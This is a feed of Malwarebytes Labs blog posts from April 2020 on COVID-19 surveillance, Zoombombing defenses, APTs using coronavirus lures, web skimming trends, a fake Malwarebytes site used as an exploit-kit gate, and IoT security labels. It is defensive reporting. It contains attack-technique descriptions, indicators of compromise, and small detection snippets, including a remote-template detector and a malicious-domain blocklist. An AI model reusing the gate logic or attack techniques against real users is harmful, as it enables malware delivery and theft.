Rapid surveillance demands rapid, shaky infrastructure

Last month, the push to digitally track the spread of coronavirus came not just from governments, but from companies that build potentially privacy-invasive technology.

Last week, Apple and Google announced a joint effort to provide Bluetooth contact tracing capabilities between the billions of iPhone and Android devices in the world.

The two companies promised to update their devices so that public health experts could develop mobile apps that allow users to voluntarily identify if they have tested positive for coronavirus. If a confirmed coronavirus app user comes into close enough contact with non-infected app users, those latter users could be notified about potential infection, whether they own an iPhone or Android.

Both Apple and Google promised a privacy-protective approach. App users will not have their locations tracked, and their identities will remain inaccessible by Apple, Google, and governments. Further, devices will automatically change users’ identifiers every 15 minutes, a step towards preventing identification of device owners. Data that is processed on devices will never leave a device unless a user chooses to share it.  

In terms of privacy protection, Apple and Google’s approach is one of the better options today.

According to Bloomberg, the Israeli firm NSO Group pitched a variety of governments across the world about a new tool that can allegedly track the spread of coronavirus. As of mid-March, about one dozen governments began testing the technology.

A follow-on investigation by VICE revealed how the new tool, codenamed “Fleming,” actually works:

“Fleming displays the data on what looks like an intuitive user interface that lets analysts track where people go, who they meet, for how long, and where. All this data is displayed on heat maps that can be filtered depending on what the analyst wants to know. For example, analysts can filter the movements of a certain patient by their last location or whether they visited any meeting places like public squares or office buildings. With the goal of protecting people’s privacy, the tool tracks citizens by assigning them random IDs, which the government—when needed—can de-anonymize[.]”

These are dangerous, invasive powers for any government to use against its citizens. The privacy concerns only grow when looking at NSO Group’s recent history. In 2018, the company was sued over allegations that it used its powerful spyware technology to help the Saudi Arabian government spy on and plot the murder of former Washington Post writer and Saudi dissident Jamal Khashoggi. Last year, NSO Group was hit with a major lawsuit from Facebook, alleging that the company sent malware to more than 1,400 WhatsApp users, who included journalists, human rights activists, and government officials.  

The questionable private-public partnerships don’t stop there.

According to The Wall Street Journal, the facial recognition startup Clearview AI—which claims to have the largest database of public digital likenesses—is working with US state agencies to track those who tested positive for coronavirus.

The New York-based startup has repeatedly boasted about its technology, saying previously that it helped the New York Police Department quickly identify a terrorism suspect. But when Buzzfeed News asked the police department about that claim, it denied that Clearview participated in the case.

Further, according to a Huffington Post investigation, Clearview’s history involves coordination with far-right extremists, one of whom marched in the “Unite the Right” rally in Charlottesville, another who promoted debunked conspiracy theories online, and another who is an avowed Neo-Nazi. One early adviser to the startup once viewed its facial recognition technology as a way to “identify every illegal alien in the country.”

Though Clearview told The Huffington Post that it separated itself from these extremists, its founder Hoan Ton-That appears unequipped to grapple with the broader privacy questions his technology invites. When interviewed earlier this year by The New York Times, Ton-That looked flat-footed in the face of obvious questions about the ability to spy on nearly any person with an online presence. As reporter Kashmir Hill wrote:

“Even if Clearview doesn’t make its app publicly available, a copycat company might, now that the taboo is broken. Searching someone by face could become as easy as Googling a name. Strangers would be able to listen in on sensitive conversations, take photos of the participants and know personal secrets. Someone walking down the street would be immediately identifiable—and his or her home address would be only a few clicks away. It would herald the end of public anonymity.

Asked about the implications of bringing such a power into the world, Mr. Ton-That seemed taken aback.

“I have to think about that,” he said. “Our belief is that this is the best use of the technology.”

One company’s beliefs about how to “best” use invasive technology is too low a bar for us to build a surveillance mechanism upon.

Should we deploy mass surveillance?

Amidst the current health crisis, multiple digital rights and privacy organizations have tried to answer the question of whether governments should deploy mass surveillance to battle coronavirus. What has emerged, rather than wholesale approvals or objections to individual surveillance programs across the world, is a framework to evaluate incoming programs.

According to Privacy International and more than 100 similar groups, government surveillance to fight coronavirus must be necessary and proportionate, must only continue for as long as the pandemic, must only be used to respond to the pandemic, must account for potential discrimination caused by artificial intelligence technologies, and must allow individuals to challenge any data collection, aggregation, retention, and use, among other restrictions.

Electronic Frontier Foundation, which did not sign Privacy International’s letter, published a somewhat similar list of surveillance restrictions, and boiled down its evaluation even further to a simple, three-question rubric:  

  • First, has the government shown its surveillance would be effective at solving the problem?
  • Second, if the government shows efficacy, we ask: Would the surveillance do too much harm to our freedoms?
  • Third, if the government shows efficacy, and the harm to our freedoms is not excessive, we ask: Are there sufficient guardrails around the surveillance? (Which the organization detailed here.)

We do not claim keener insight than our digital privacy peers. In fact, much of our research relies on theirs. But by focusing on the types of surveillance installed currently, and past surveillance installed years ago, we err cautiously against any mass surveillance regime developed specifically to track and limit the spread of coronavirus.

Flatly, the rapid deployment of mass surveillance to protect the public has rarely, if ever, worked as intended. Mass surveillance has not provably “solved” a crisis, and in the United States, one emergency surveillance regime grew into a bloated, ineffective, noncompliant warship, apparently rudderless today.

We should not take these same risks again.

The lessons of Section 215

On October 4, 2001, less than one month after the US suffered the worst attack on American soil when terrorists felled the World Trade Center towers on September 11, President George W. Bush authorized the National Security Agency to collect certain phone content and metadata without first obtaining warrants.

According to an NSA Inspector General’s working draft report, President Bush’s authorization was titled “Authorization for specified electronic surveillance activities during a limited period to detect and prevent acts of terrorism within the United States.”

In 2006, the described “limited period” powers continued, as Attorney General Alberto Gonzalez argued before a secretive court that the court should retroactively legalize what the NSA had been doing for five years—collecting the phone call metadata of nearly every American, potentially revealing the numbers we called, the frequency we dialed them, and for how long we spoke. The court later approved the request.

The Attorney General’s arguments partially cited a separate law passed by Congress in 2001 that introduced a new surveillance authority for the NSA, Section 215, which allows the collection of “call detail records”: logs of phone calls, but not phone call content. Though Section 215 received significant reforms in 2015, it lingers today. Only recently has the public learned about collection failures under its authority.

In 2018, the NSA erased hundreds of millions of call and text detail records collected under Section 215 because the NSA could not reconcile their collection with the actual requirements of the law. In February, the public also learned that, despite collecting countless records across four years, only twice did the NSA uncover information that the FBI did not already have. Of those two occasions, only once did the information lead to an investigation.

Complicating the matter is the fact that the NSA shut down the call detail record program in the summer of 2019, but the program’s legal authority remains in limbo, as the Senate approved a 77-day extension in mid-March, but the House of Representatives is not scheduled to return to Congress until early May.

If this sounds frustrating, it is, and Senators and Representatives on both sides have increasingly questioned these surveillance powers.

Remember, this is how difficult it is to dismantle a surveillance machine with proven failures. We doubt it will be any easier to dismantle whatever regime the government installs to fight coronavirus.

Separate from our recent history of over-extended surveillance is the matter of whether data collection actually works at tracking and limiting coronavirus.

So far, results range from unclear to mixed.

The problems with location and proximity tracking

In 2014, government officials, technologists, and humanitarian groups installed large data collection regimes to track and limit the spread of the Ebola outbreak in West Africa.

Harvard’s School of Public Health used cell phone “pings” to chart rough estimates of callers’ locations based on the cell towers they connected to when making calls. The US Centers for Disease Control and Prevention similarly looked at cell towers which received high numbers of emergency phone calls to determine whether an outbreak was occurring in near real-time.

But according to Sean McDonald of the Berkman Klein Center for Internet and Society at Harvard University, little evidence exists to show whether location tracking helps prevent the spread of illnesses at all.

In a foreword to his 2016 paper “Ebola: A big data disaster,” McDonald analyzed South Korea’s 2014 response to Middle East Respiratory Syndrome (MERS), a separate coronavirus. To limit the spread, the South Korean government grabbed individuals’ information from the country’s mobile phone providers and implemented a quarantine on more than 17,000 people based on their locations and the probabilities of infection.

But the South Korean government never opened up about how it used citizens’ data, McDonald wrote.

“What we don’t know is whether that seizure of information resulted in a public good,” McDonald wrote. “Quite the opposite, there is limited evidence to suggest that migration or location information is a useful predictor of the spread of MERS at all.”

Further, recent efforts to provide contact tracing through Bluetooth connectivity—which is not the same as location tracking—have not been tested on a large enough scale to prove effective.

According to a mid-March report from The Economist, just 13 percent of Singapore’s population had installed the country’s contact tracing app, TraceTogether. The low number looks worse when gauging the success in fighting coronavirus.

According to The Verge, if Americans installed a Bluetooth contact tracing app at the same rate as Singaporeans, the likelihood of being notified because of a chance encounter with another app user would be just 1.44 percent.
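The arithmetic behind a figure like that is simple: a chance encounter is only logged if both parties run the app, so coverage falls with the square of the adoption rate. A quick sketch, assuming installs are independent and uniform across the population (a simplification of our own, not The Verge’s exact methodology):

```python
def encounter_coverage(adoption_rate: float) -> float:
    """Probability that both parties to a random encounter run the app,
    assuming independent, uniform adoption across the population."""
    return adoption_rate ** 2

# At Singapore-like adoption of roughly 12 percent:
# 0.12 * 0.12 = 0.0144, i.e. about 1.44 percent of encounters covered
```

The squared relationship is why proponents argue adoption rates need to reach well past 50 percent before such apps meaningfully cover day-to-day encounters.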

Worse, according to Dr. Farzad Mostashari, former national coordinator for health information technology at the Department of Health and Human Services, Bluetooth contact tracing could create many false positives. As he told The Verge:

“If I am in the wide open, my Bluetooth and your Bluetooth might ping each other even if you’re much more than six feet away. You could be through the wall from me in an apartment, and it could ping that we’re having a proximity event. You could be on a different floor of the building and it could ping.”

This does not mean Bluetooth contact tracing is a bad idea, but it isn’t the silver bullet some imagine. Until we know whether even location tracking works, we should assume the same of proximity tracking.

Stay safe

Today is exhausting, and, sadly, tomorrow will be, too. We don’t have the answers to bring things back to normal. We don’t know if those answers exist.

What we do know is that, understandably, now is a time of fear. That is normal. That is human.

But we should avoid letting fear dictate decisions as significant as this one. In the past, mass surveillance has grown unwieldy, lasted longer than planned, and proved ineffective. Today, it is being driven by opportunistic private actors whom we should not trust as the sole gatekeepers to expanded government powers.

We have no proof that mass surveillance alone will solve this crisis. Only fear lets us believe it will.

The post Mass surveillance alone will not save us from coronavirus appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Keep Zoombombing cybercriminals from dropping a load on your meetings

Malwarebytes - Tue, 04/14/2020 - 15:00

While shelter in place has left many companies struggling to stay in business during the COVID-19 epidemic, one company in particular has seen its fortunes rise dramatically. Zoom, the US-based maker of teleconferencing software, has become the web conference tool of choice for employees working from home (WFH), friends coming together for virtual happy hour, and families trying to stay connected. Since March 15, Zoom has occupied the top spot on Apple’s App Store. Only one week prior, Zoom was the 103rd-most popular app. 

Even late-night talk show hosts have jumped on the Zoom bandwagon, with Samantha Bee, Stephen Colbert, Jimmy Fallon, and Jimmy Kimmel using a combination of Zoom and cellphone video to produce their respective shows from home. 

In an incredibly zeitgeisty moment, everyone and their parents are Zooming. Unfortunately, opportunistic cybercriminals, hackers, and Internet trolls are Zooming, too.

What is Zoombombing?

Since the call for widespread sheltering in place, a number of security exploits have been discovered within the Zoom technology. Most notably, a technique called Zoombombing has risen in popularity, whether for pure mischief or more criminal purpose.

Zoombombing, also known as Zoom squatting, occurs when an unauthorized user joins a Zoom conference, either by guessing the Zoom meeting ID number, reusing a Zoom meeting ID from a previous meeting, or using a Zoom ID received from someone else. In the latter case, the Zoom meeting ID may have been shared with the Zoombomber by someone who was actually invited to the meeting or circulated among Zoombombers online.  

The relative ease by which Zoombombing can happen has led to a number of embarrassing and offensive episodes.

In one incident, a pornographic video appeared during a Zoom meeting hosted by a Kentucky college. During online instruction at a high school in San Diego, a racist word was typed into the classroom chat window while another bomber held up a sign that said the teacher “Hates Black People.” And in another incident, a Zoombomber drew male genitalia on screen while a doctoral candidate defended his dissertation.

Serious Zoombombing shenanigans

The Zoombombing problem has gotten so bad that the US Federal Bureau of Investigation has issued a warning.

That said, it’s the Zoombombs that no one notices that are most worrying, especially for Zoom’s business customers. Zoombombers can discreetly enter a Zoom conference and capture screenshots of confidential screenshares and record video and audio from the meeting. While it’s not likely for a Zoom participant to put up a slide with their username and password, the information gleaned from a Zoom meeting can be used in a phishing or spear phishing attack.

As of right now, there hasn’t been a publicly disclosed data breach as a result of a Zoombomb, but the notion isn’t far-fetched.

Numerous organizations and educational institutions have announced they will no longer be using Zoom. Of note, Google has banned the use of Zoom on company-owned devices in favor of their own Google Hangouts. The New York City Department of Education announced they’d no longer be using Zoom for remote learning. And Elon Musk’s SpaceX has banned Zoom, noting “significant privacy and security concerns” in a company-wide memo.

“Most Zoombombing incidents can be prevented with a little due diligence on the part of the user,” Malwarebytes Head of Security John Donovan said. “Anyone using Zoom, or any web conference software for that matter, is strongly encouraged to review their conference settings and minimize the permissions allowed for their conference attendees.”

“You can’t walk into a high school history class and start heckling the teacher. Unfortunately, the software lets people do that if you’re not careful,” he added.

For their part, Zoom has published multiple blog posts acknowledging the security issues with their software, changes the company has made to shore up security, and tips for keeping conferences private.

Set your meeting ID to generate automatically and always require a password.

Keep your Zoom meetings secure

Here are our tips for keeping your Zoom meetings secure and free from Zoombombers. Keep in mind that many of these tips apply to other teleconferencing tools as well. 

  1. Generate a unique meeting ID. Using your personal ID for meetings is like having an open-door policy—anyone can pop in at any time. Granted, it’s convenient and easy to remember. However, if a Zoombomber successfully guesses your personal ID, they can drop in on your meetings whenever they want or even share your meeting ID with others.
  2. Set a password for each meeting. Even if you have a unique meeting ID, an invited participant can still share your meeting ID with someone outside your organization. Adding a password to your meeting is one more layer of security you can add to keep interlopers out.
  3. Allow signed-in users only. With this option, it won’t matter if Zoombombers have the meeting ID—even the password. This setting requires everyone to be signed in to Zoom using the email they were invited through.
  4. Use the waiting room. With the waiting room enabled, the meeting doesn’t start until the host arrives and admits everyone. Attendees can’t communicate with each other while they’re in the waiting room. This gives you one additional layer of manual verification before anyone can join your meeting.
  5. Enable the chime when users join or leave the meeting. Besides giving you a reason to embarrass late arrivals, the chime ensures no one can join your meeting undetected. The chime is usually on by default, so you may want to check to make sure you haven’t turned it off in your settings.
  6. Lock the room once the meeting has begun. Once all expected attendees have joined, lock the meeting. It seems simple, but it’s another easy way to keep Zoombombing at bay.
  7. Limit screen sharing. Before the meeting starts, you can restrict who can share their screen to just the host. And during the meeting, you can change this setting on the fly, in case a participant ends up needing to show something.

A special note for IT administrators: As a matter of company policy, many of these Zoom settings can be set to default. You can even further lock down settings for a particular group of users with access to sensitive information (or those with a higher learning curve on cybersecurity hygiene). For more detailed information, see the Zoom Help Center.

Remember, Zoombombing isn’t just embarrassing—it’s a big security risk. Sure, the Zoombombing incidents making headlines at the moment seem to be about trolling people more than anything else, but the potential for more serious abuse exists.

No matter which web conferencing software you use, take a moment to learn its settings and make smart choices about the data you share in your meetings. Do this, and you’ll have a safe and happy socially-distanced gathering each time you sign on.

The post Keep Zoombombing cybercriminals from dropping a load on your meetings appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Lock and Code S1Ep4: coronavirus and responding to computer viruses with Akshay Bhargava

Malwarebytes - Mon, 04/13/2020 - 17:01

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Akshay Bhargava, Chief Product Officer of Malwarebytes, about the similarities between coronavirus and computer viruses. We discuss computer virus prevention, detection, and response, and the simple steps that consumers and businesses can take today to better protect themselves from a spreading cyberattack.

Tune in for all this and more on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, on Google Play Music, plus whatever preferred podcast platform you use.


Stay safe, everyone!

The post Lock and Code S1Ep4: coronavirus and responding to computer viruses with Akshay Bhargava appeared first on Malwarebytes Labs.

Categories: Techie Feeds

APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure

Malwarebytes - Thu, 04/09/2020 - 17:05

The coronavirus (COVID-19) has become a global pandemic, and this is a golden time for attackers, who take advantage of our collective fear to increase the likelihood of a successful attack. True to form, they’ve been doing just that: running spam and spear phishing campaigns that use coronavirus as a lure against government and non-government entities.

From late January on, several cybercriminal and state-sponsored advanced persistent threat (APT) groups have been using coronavirus-based phishing as their infection vector to gain a foothold on victim machines and launch malware attacks. Mirroring the spread of the coronavirus itself, China was the first country targeted by APT groups; as the virus spread worldwide, so did the attacks.

In the following paper, we provide an overview of APT groups that have been using coronavirus as a lure, and we analyze their infection techniques and eventual payloads. We categorize the APT groups based on four different attack vectors used in COVID-19 campaigns: template injection, malicious macros, RTF exploits, and malicious LNK files.

You can view the full report on APTs using COVID-19 HERE.

Attack vectors
  • Template injection: Template injection refers to a technique in which the actors embed a script moniker in the lure document that links to a malicious Office template in the document’s XML settings. Upon opening the document, the remote template is fetched and executed. The Kimsuky and Gamaredon APTs used this technique.
  • Malicious macros: Embedding malicious macros is the most popular method used by threat groups. In this technique, a macro is embedded in the lure document that will be activated upon opening. Konni (APT37), APT36, Patchwork, Hades, TA505, TA542, Bitter, APT32 (Ocean Lotus) and Kimsuky are the actors using this technique.
  • RTF exploits: RTF is a flexible text format that allows embedding any object type within it, which makes RTF files vulnerable to many OLE object-related vulnerabilities. Several Chinese threat actors use RTF files, among them the Calypso group and Winnti.
  • Malicious LNK files: An LNK file is a shortcut file used by Microsoft Windows and is a Shell item type that can be executed. Mustang Panda is a Chinese threat actor that uses this technique to drop either a variant of the PlugX RAT or Cobalt Strike onto victims’ machines. Higaisia is a North Korean threat group that also uses this method.
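As a rough illustration of how defenders can hunt for the template injection technique: a .docx file is just a ZIP archive, and a remote template appears as an external `attachedTemplate` relationship inside one of its `.rels` files. The sketch below is our own example of such a check (not tooling used by these actors), using a crude string heuristic rather than full OOXML parsing:

```python
import io
import re
import zipfile

def find_remote_templates(docx_bytes: bytes) -> list[str]:
    """Return http(s) URLs from relationship files that mention an
    attachedTemplate -- a telltale sign of remote template injection."""
    urls = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            xml = z.read(name).decode("utf-8", errors="replace")
            # Crude heuristic: an attachedTemplate relationship with an
            # external http(s) target in the same relationships file.
            if "attachedTemplate" in xml:
                urls += re.findall(r'Target="(https?://[^"]+)"', xml)
    return urls

# Demo: build a minimal fake .docx containing such a relationship.
buf = io.BytesIO()
with zipfile.ZipFile(buf, "w") as z:
    z.writestr(
        "word/_rels/settings.xml.rels",
        '<Relationships><Relationship Id="rId1" '
        'Type=".../attachedTemplate" '
        'Target="https://malicious.example/template.dotm" '
        'TargetMode="External"/></Relationships>',
    )
print(find_remote_templates(buf.getvalue()))
```

A benign document with no remote template yields an empty list, so this makes a quick first-pass triage filter for suspicious lure documents.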

We expect that in the coming weeks and months, APT threat actors will continue to leverage this crisis to craft phishing campaigns using the techniques mentioned in the paper to compromise their targets.

The Malwarebytes Threat Intelligence Team is monitoring the threat landscape and paying particular attention to attacks trying to abuse the public’s fear around the COVID-19 crisis. Our Malwarebytes consumer and business customers are protected against these attacks, thanks to our multi-layered detection engines.

The post APTs and COVID-19: How advanced persistent threats use the coronavirus as a lure appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Online credit card skimming increased by 26 percent in March

Malwarebytes - Wed, 04/08/2020 - 16:00

Crisis events such as the current COVID-19 pandemic often lead to a change in habits that captures the attention of cybercriminals. With the confinement measures imposed in many countries, for example, online shopping has soared, and along with it, credit card skimming. According to our data, web skimming increased by 26 percent in March over the previous month.

While this might not seem like a dramatic jump, digital credit card skimming was already on the rise prior to COVID-19, and this trend will likely continue into the near future.

While many merchants remain safe despite the increased volume in processed transactions, the exposure to compromised e-commerce stores is greater than ever.

Change in habits translates into additional web skimming attempts

Web skimming, known under various names but popularized by the ‘Magecart’ moniker, is the process of stealing customer data, including credit card information, from compromised online stores.

We actively track web skimmers so that we can protect our customers running Malwarebytes or Browser Guard (the browser extension) when they shop online.

The stats presented below exclude any telemetry from our Browser Guard extension and reflect a portion of the overall web skimming landscape, per our own visibility. For instance, server-side skimmers will go unaccounted for, unless the merchant site itself has been identified as compromised and is blacklisted.

One trend we noticed is that the number of skimming blocks is at its highest on Mondays (which happens to be the busiest day for online shopping), tapering off in the second half of the week and reaching its lowest point on weekends.

The second observation is that the number of web skimming blocks increased only slightly from January to February (2.5 percent) but then jumped from February to March (26 percent). While this is still a moderate increase, we believe it marks a trend that will become more apparent in the coming months.

The final chart shows that we recorded the most skimming attempts in the US, followed by Australia and Canada. This trend coincides with the quarantine measures that began rolling out in mid-March.

Minimizing risks: a shared responsibility

As we see with other threats, there isn’t one single answer to mitigating web skimming. In fact, it can be fought from many different sides, starting with online merchants, the security community, and shoppers themselves.

A great number of merchants do not keep their platforms up to date and also fail to respond to security disclosures. Oftentimes, the last recourse for reporting a breach is to go public and hope that the media attention will bear fruit.

Many security vendors actively track web skimmers and add protection capabilities into their products. This is the case with Malwarebytes: web protection is available in both our desktop product and browser extension. Sharing our findings and attempting to disrupt skimming infrastructure is effective at tackling the problem at scale, rather than on an individual (per-site) basis.

Shopping online is convenient but not risk-free. Ultimately, users are the ones who can make savvy choices and avoid many pitfalls. Here are some recommendations:

  • Limit the number of times you have to manually enter your credit card data. Rely on platforms where that information is already stored in your account or use one-time payment options.
  • Check if the online store displays properly in your browser, without any errors or certain red flags indicating that it has been neglected.
  • Do not take trust seals or other indicators of confidence at face value. Because a site displays a logo saying it’s 100% safe does not mean it actually is.
  • If you are unsure about a site, you can use certain tools to scan it for malware or to see if it’s already on a blacklist.
  • More advanced users may want to examine a site’s source code, using Developer Tools for instance, which, as a side effect, may cause a skimmer to turn itself off once it notices it is being inspected.
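The blocklist lookup mentioned above can be sketched very simply. The example below is purely illustrative (real reputation services normalize and match far more thoroughly); the sample entries are the un-defanged copycat domains discussed elsewhere in this feed:

```python
# Hypothetical, minimal local blocklist -- sample entries taken from
# the copycat campaigns covered in this feed.
BLOCKLIST = {"malwarebytes-free.com", "popcashexhange.xyz"}

def normalize(domain: str) -> str:
    """Lowercase, strip a trailing dot, and drop a leading 'www.' so
    equivalent spellings of the same host compare equal."""
    domain = domain.lower().rstrip(".")
    return domain[4:] if domain.startswith("www.") else domain

def is_blocklisted(domain: str) -> bool:
    return normalize(domain) in BLOCKLIST

print(is_blocklisted("WWW.malwarebytes-free.com"))  # True
print(is_blocklisted("malwarebytes.com"))           # False
```

In practice you would feed such a check from a regularly updated threat intelligence source rather than a hard-coded set.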

We expect web skimming activity to remain on an upward trend in the coming months as the online shopping habits forged during this pandemic continue well beyond it. For more tips, please check out our post Important tips for safe online shopping post COVID-19.

The post Online credit card skimming increased by 26 percent in March appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Copycat criminals abuse Malwarebytes brand in malvertising campaign

Malwarebytes - Tue, 04/07/2020 - 18:27

While exploit kit activity has been fairly quiet for some time now, we recently discovered a threat actor creating a copycat—fake—Malwarebytes website that was used as a gate to the Fallout EK, which distributes the Raccoon stealer.

The few malvertising campaigns that remain are often found on second- and third-tier adult sites, leading to the Fallout or RIG exploit kits, as a majority of threat actors have moved on to other distribution vectors. However, we believe this faux Malwarebytes malvertising campaign could be payback for our continued work with ad networks to track, report, and dismantle such attacks.

In this blog, we break down the attack and possible motives.

Stolen template includes malicious code

A few days ago, we were alerted about a copycat domain name that abused our brand. The domain malwarebytes-free[.]com was registered on March 29 via REGISTRAR OF DOMAIN NAMES REG.RU LLC and is currently hosted in Russia at 173.192.139[.]27.

Examining the source code, we can confirm that someone stole the content from our original site but added something extra.

A JavaScript snippet checks which browser you are running; if it happens to be Internet Explorer, you are redirected to a malicious URL belonging to the Fallout exploit kit.
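We are not reproducing the actors’ exact snippet here, but logically it boils down to a user-agent test. A Python rendering of an equivalent check (for illustration only; the real gate runs as JavaScript in the page) might look like this:

```python
def looks_like_internet_explorer(user_agent: str) -> bool:
    # Classic IE fingerprints: the "MSIE" token (IE 10 and earlier)
    # or the Trident engine token (IE 11).
    return "MSIE " in user_agent or "Trident/" in user_agent

ie11 = "Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like Gecko"
chrome = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) "
          "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0 Safari/537.36")

print(looks_like_internet_explorer(ie11))    # True
print(looks_like_internet_explorer(chrome))  # False
```

Targeting only Internet Explorer makes sense for an exploit kit operator, since its aging engine is what the kit’s exploits are written against.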

Infection chain for copycat campaign

This fake Malwarebytes site is actively used as a gate in a malvertising campaign via the PopCash ad network, which we contacted to report the malicious advertiser.

Fallout EK is one of the newer (or perhaps last) exploit kits that is still active in the wild. In this sequence, it is used to launch the Raccoon stealer onto victim machines.

A motive behind decoy pages

The threat actor behind this campaign may be tied to others we’ve been tracking for a few months. They have used similar fake copycat templates before that act as gates. For example, this fake Cloudflare domain (popcashexhange[.]xyz) also plays on the PopCash name:

There is no question that security companies working with providers and ad networks are hindering cybercriminals’ efforts and costing them money. We’re not sure whether we should take this plagiarism as a compliment or not.

If you are an existing Malwarebytes user, you were already safe from this malvertising campaign, thanks to our anti-exploit protection.

Copycat tactics have long been used by scammers and other criminals to dupe online and offline victims. As always, it is better to double-check the identity of the website you are visiting and, if in doubt, access it directly, either by typing in the URL or via a bookmarked page or tab.

Indicators of compromise

Fake Malwarebytes site

malwarebytes-free[.]com
31.31.198[.]161

Fallout EK

134.209.86[.]129

Raccoon Stealer

78a90f2efa2fdd54e3e1ed54ee9a18f1b91d4ad9faedabd50ec3a8bb7aa5e330
34.89.159[.]33
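To compare a suspect file against the Raccoon sample’s SHA-256 above, compute the file’s digest and compare. A minimal sketch (the helper names and file path handling are our own):

```python
import hashlib

# SHA-256 of the Raccoon stealer sample listed above.
IOC_SHA256 = "78a90f2efa2fdd54e3e1ed54ee9a18f1b91d4ad9faedabd50ec3a8bb7aa5e330"

def sha256_of(path: str) -> str:
    """Hash a file in chunks so large samples need not fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def matches_ioc(path: str) -> bool:
    return sha256_of(path) == IOC_SHA256
```

A match is definitive for this exact sample, but a non-match proves little: repacked or slightly modified builds produce entirely different hashes.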

The post Copycat criminals abuse Malwarebytes brand in malvertising campaign appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Cybersecurity labeling scheme introduced to help users choose safe IoT devices

Malwarebytes - Tue, 04/07/2020 - 15:52

The Internet of Things (IoT) is a term used to describe a wide variety of devices that are connected to the Internet to improve user experience. For example, a doorbell becomes part of the IoT when it connects to the Internet and allows users to see visitors outside their door.

But the way in which some of these IoT devices connect invites serious security and privacy concerns. This has led to pleas for laws and regulation in the production and marketing of IoT devices, including increased security features and better visibility into the security of those features.

Our loyal readers have seen our regular complaints about the built-in security of IoT devices and know how concerned we are about products that are designed to optimize functionality and cost over security. Many manufacturers expect consumers to care more about ease-of-use than about security.

But while this may be true for many consumers, the apparent indifference can also be explained by a lack of comparable options. If consumers were given the choice between a device that’s cheap, easy to use, and insecure and a device that’s a bit more costly but keeps users protected—our bet is there’d be a good chunk of consumers who’d select the more secure option.

While some states and countries do have laws demanding manufacturers produce “safe” products, this doesn’t help consumers in making a choice. At best, it limits their choice as some unsafe products will not make it to the market. To help users make an informed decision, some countries have decided to introduce a new cybersecurity labeling scheme (CLS) that provides consumers with information about the security of connected smart devices.

Countries introducing a cybersecurity labeling scheme

In November 2019, Finland became the first country in Europe to grant information security certificates to devices that passed the required tests. Their reasoning was that the security level of devices in the market varies a lot, and there’s no easy way for consumers to know which products are safe and which are not. As a service to the public, a website was launched to make it easy to find information about the devices that have been awarded the label.

On January 27, 2020, the UK’s Digital Minister Matt Warman announced a new law to protect millions of IoT users from the threat of cyberattack. The plan is to make sure that all consumer smart devices sold in the UK adhere to rigorous security requirements for the Internet of Things (IoT).

Shortly after the UK, the Cyber Security Agency of Singapore (CSA) announced plans to introduce a new Cybersecurity Labeling Scheme (CLS) later this year to help consumers make informed purchasing choices about network-connected smart devices.

As part of the initiative, CLS will address the security of IoT devices, a growing area of concern. The CLS, which is a first for the Asia-Pacific region, will first be introduced to two product types: WiFi routers and smart home hubs.

Recommended reading: 8 ways to improve security on smart home devices

The goals of a cybersecurity labeling scheme

The cybersecurity labeling scheme will be aligned with globally accepted security standards for consumer Internet of Things products. It will mean that robust security standards are introduced from the design stage and not bolted on as an afterthought.

The scheme proposes that such devices should carry a security label to help consumers navigate the market and know which devices to trust, and to encourage manufacturers to improve security. The idea is that—similar to how Bluetooth and WiFi labels help consumers feel confident their products will work with wireless communication protocols—a security label will instill confidence in consumers that their device was built according to security standards.

The Singapore CLS is a first-of-its-kind cybersecurity rating system in the APAC region and is primarily aimed at helping consumers make informed choices. The rating of a product will be based on a series of assessments and tests including, but not limited to:

  • Meeting basic security requirements (e.g. unique default passwords)
  • Adherence to software and hardware security-by-design principles
  • Absence of common software security vulnerabilities
  • Resistance to basic penetration testing activity

The same is true for the law that is under preparation for the UK. Their primary security requirements are:

  • All consumer Internet-connected device passwords must be unique and not resettable to any universal factory setting.
  • Manufacturers of consumer IoT devices must provide a public point of contact so anyone can report a vulnerability, and it will be acted on in a timely manner.
  • Manufacturers of consumer IoT devices must explicitly state the minimum length of time for which the device will receive security updates at the point of sale, either in store or online.

As you can see, in both cases the main worry was the omnipresence of default passwords that were identical across a whole series of devices. On top of that, users were not clearly informed that they needed to change the default password, and it was often hard for the average user to do so.

Optimizing the CLS

We applaud the efforts made by governments to improve on the overall security of IoT devices, but there are some improvements we would like to suggest.

  • The Finnish site is available in Finnish and Swedish. For an outsider, it is hard to make out which products are approved and why. An English version would be a big step forward.
  • The laws in the UK and California are a good start but could have been more restrictive. And they don’t inform a customer about the security of a device when they are looking to buy from a web shop that might be abroad.
  • The Singapore CLS for now focuses on routers and smart home hubs because they consider them the gateways to the rest of the household. While this makes sense, it is a limited scope.

What all these regulations have in common is that they only inform the customer whether a device has passed muster in a certain state or country. Surely we can come up with a global scheme that gives customers a security rating between “don’t buy this” and “very safe,” like the energy efficiency labels we have in the EU.

EU energy labels

But let’s rejoice for now that these governments are making a start on a much-needed effort to improve devices and inform customers. Let us hope that the various security labeling schemes will help consumers make informed choices, drive manufacturers to focus more on security, and inspire other governments to follow suit.

Stay safe, everyone!

The post Cybersecurity labeling scheme introduced to help users choose safe IoT devices appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (March 30 – April 5)

Malwarebytes - Mon, 04/06/2020 - 17:05

Last week on Malwarebytes Labs, we offered readers tips for safe online shopping now that cybercriminals are ramping up Internet-based attacks, showed the impact that GDPR has around the world, and helped users understand how social media platforms mine their personal data. We also hosted our bi-weekly podcast, Lock and Code, with guest Adam Kujawa, who discussed the state of data privacy today.

Other cybersecurity news:
  • Two zero-day vulnerabilities were used by two different groups to infiltrate DrayTek Vigor enterprise routers and switch devices. (Source: SCMagazine)
  • An organisation, Cyber Volunteers 19 (CV19), is being set up to help people volunteer their IT security expertise and services to healthcare. (Source: Graham Cluley)
